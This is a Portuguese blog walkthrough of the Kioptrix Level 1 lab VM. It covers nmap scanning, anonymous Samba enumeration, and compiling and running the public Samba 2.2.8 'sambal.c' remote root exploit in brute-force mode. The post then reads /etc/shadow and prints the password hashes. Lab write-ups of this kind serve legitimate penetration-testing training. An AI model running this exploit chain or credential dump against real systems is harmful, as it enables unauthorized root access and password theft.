Maiores informações e Download você pode estar acessando diretamente o site.
http://www.kioptrix.com/blog/
Neste artigo vamos estar utilizando o Kioptrix Level 1, onde o principal objetivo é ganhar o acesso root.
Os testes vou utilizar uma máquina Virtual com Backtrack 5 R2.
Quando subimos a ISO do Kioptrix, ela já está configurada para buscar diretamente o ip por dhcp.
Precisamos identificar qual o ip que a mesma está utilizando.
Para isso vamos efetuar os seguintes testes:
1-) Discovery
root@bt:~# nmap -f -n -P0 -v -p- -T4 192.168.0.0/24
Nmap scan report for 192.168.0.104
Host is up (0.00084s latency).
Not shown: 65528 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
443/tcp open https1024/tcp open kdm
45295/tcp open unknown
MAC Address: 30:14:4A:12:1D:E2 (Wistron Neweb)
root@bt:~# nmap -n -sTUV -pT:22,80,11,139,443,32768,U:111,137,32768 192.168.0.104
Starting Nmap 6.00 ( http://nmap.org ) at 2012-06-23 23:51 BRT
Nmap scan report for 192.168.0.104
Host is up (0.0038s latency).
PORT STATE SERVICE VERSION
11/tcp closed systat
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
32768/tcp closed filenet-tms
111/udp open rpcbind (rpcbind V2) 2 (rpc #100000)
137/udp open netbios-ns Microsoft Windows XP netbios-ssn
32768/udp closed omad
MAC Address: 30:14:4A:12:1D:E2 (Wistron Neweb)
Service Info: Host: KIOPTRIX; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.30 seconds
2-) Banner com SMBCLIENT como anonymous.
root@bt:~# smbclient -L 192.168.0.104 -N
Anonymous login successful
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]
Sharename Type Comment
--------- ---- -------
cli_rpc_pipe_open_noauth: rpc_pipe_bind for pipe \srvsvc failed with error ERRnosupport
IPC$ IPC IPC Service (Samba Server)
ADMIN$ Disk IPC Service (Samba Server)
Anonymous login successful
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]
Server Comment
--------- -------
KIOPTRIX Samba Server
Workgroup Master
--------- -------
MYGROUP KIOPTRIX
WORKGROUP THIAGO-PC
Note que a versão utilizada pelo SAMBA é a versão 2.2.1a.
Vamos procurar um exploit para esta versão, utilizando o recurso de exploit-db no próprio backtrack.
root@bt:/pentest/exploits/exploitdb# ./searchsploit samba
Description Path
--------------------------------------------------------------------------- -------------------------
Samba 2.2.x Remote Root Buffer Overflow Exploit /linux/remote/7.pl
Samba 2.2.8 Remote Root Exploit - sambal.c /linux/remote/10.c
Samba 2.2.8 (Bruteforce Method) Remote Root Exploit /linux/remote/55.c
MS Windows XP/2003 Samba Share Resource Exhaustion Exploit /windows/dos/148.sh
Samba <= 3.0.4 SWAT Authorization Buffer Overflow Exploit /linux/remote/364.pl
Sambar FTP Server 6.4 (SIZE) Remote Denial of Service Exploit /windows/dos/2934.php
GoSamba 1.0.1 (include_path) Multiple RFI Vulnerabilities /php/webapps/4575.txt
Samba 3.0.27a send_mailslot() Remote Buffer Overflow PoC /linux/dos/4732.c
Samba (client) receive_smb_raw() Buffer Overflow Vulnerability PoC /multiple/dos/5712.pl
Samba (client) receive_smb_raw() Buffer Overflow Vulnerability PoC /multiple/dos/5712.pl
Samba < 3.0.20 Remote Heap Overflow Exploit (oldie but goodie) /linux/remote/7701.txt
Samba 2.2.0 - 2.2.8 trans2open Overflow (OS X) /osX/remote/9924.rb
Para este vamos estar utilizando o exploit 10.c, onde vamos compilar e alterar as saídas de rro que retornar.
Obs* Os erros na compilação são propositais, paradificultar os scripts kidies, onde se faz necessário aprender com os erros retornados e entender a funcionalidade do código.
Copiaremos este exploit para um diretório e vamos executar o mesmo:
root@bt:~# cp /pentest/exploits/exploitdb/platforms/linux/remote/10.c /root/10.c
Vamos compilar:
root@bt:~# gcc 10.c -o sambavul10
Dica: Para a correção dos erros retornados com o comando gcc, é necessário a identação correta do código.
Vamos executar o exploit:
root@bt:~# ./sambavul10 -v -d -0 -S 192.168.0.104
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
+ Scan mode.
+ Verbose mode.
+ [192.168.0.104] Samba
Faça um ctrl + c para parar o Scan.
Agora vamos executar com o parametro -b para efetuar um bruteforce e ganhar o acesso atravé do serviço do SAMBA:
root@bt:~# ./sambavul10 -b 0 -v 192.168.0.104
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
+ Verbose mode.
+ Bruteforce mode. (Linux)
+ Host is running samba.
+ Using ret: [0xbffffed4]
+ Using ret: [0xbffffda8]
+ Worked!
--------------------------------------------------------------
*** JE MOET JE MUIL HOUWE
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=0(root) gid=0(root) groups=99(nobody)
Veja a saída comando já identificando o hostna e o parametro id onde já informa as credenciais de root.
Agora vamos verificar o arquivo shadow:
root@bt:~# ./sambavul10 -b 0 -v 192.168.0.104
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
+ Verbose mode.
+ Bruteforce mode. (Linux)
+ Host is running samba.
+ Using ret: [0xbffffed4]
+ Using ret: [0xbffffda8]
+ Worked!
--------------------------------------------------------------
*** JE MOET JE MUIL HOUWE
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=0(root) gid=0(root) groups=99(nobody)
cd /etc ; cat shadow
root:$1$XROmcfDX$tF93GqnLHOJeGRHpaNyIs0:14513:0:99999:7:::
bin:*:14513:0:99999:7:::
daemon:*:14513:0:99999:7:::
adm:*:14513:0:99999:7:::
lp:*:14513:0:99999:7:::
sync:*:14513:0:99999:7:::
shutdown:*:14513:0:99999:7:::
halt:*:14513:0:99999:7:::
mail:*:14513:0:99999:7:::
news:*:14513:0:99999:7:::
uucp:*:14513:0:99999:7:::
operator:*:14513:0:99999:7:::
games:*:14513:0:99999:7:::
gopher:*:14513:0:99999:7:::
ftp:*:14513:0:99999:7:::
nobody:*:14513:0:99999:7:::
mailnull:!!:14513:0:99999:7:::
rpm:!!:14513:0:99999:7:::
xfs:!!:14513:0:99999:7:::
rpc:!!:14513:0:99999:7:::
rpcuser:!!:14513:0:99999:7:::
nfsnobody:!!:14513:0:99999:7:::
nscd:!!:14513:0:99999:7:::
ident:!!:14513:0:99999:7:::
radvd:!!:14513:0:99999:7:::
postgres:!!:14513:0:99999:7:::
apache:!!:14513:0:99999:7:::
squid:!!:14513:0:99999:7:::
pcap:!!:14513:0:99999:7:::
john:$1$zL4.MR4t$26N4YpTGceBO0gTX6TAky1:14513:0:99999:7:::
harold:$1$Xx6dZdOd$IMOGACl3r757dv17LZ9010:14513:0:99999:7:::
Neste artigo a idéia foi mostrar os passos para completar o desafio de Level 1, onde é necessário ganhar o shell como root : )
Nenhum comentário:
Postar um comentário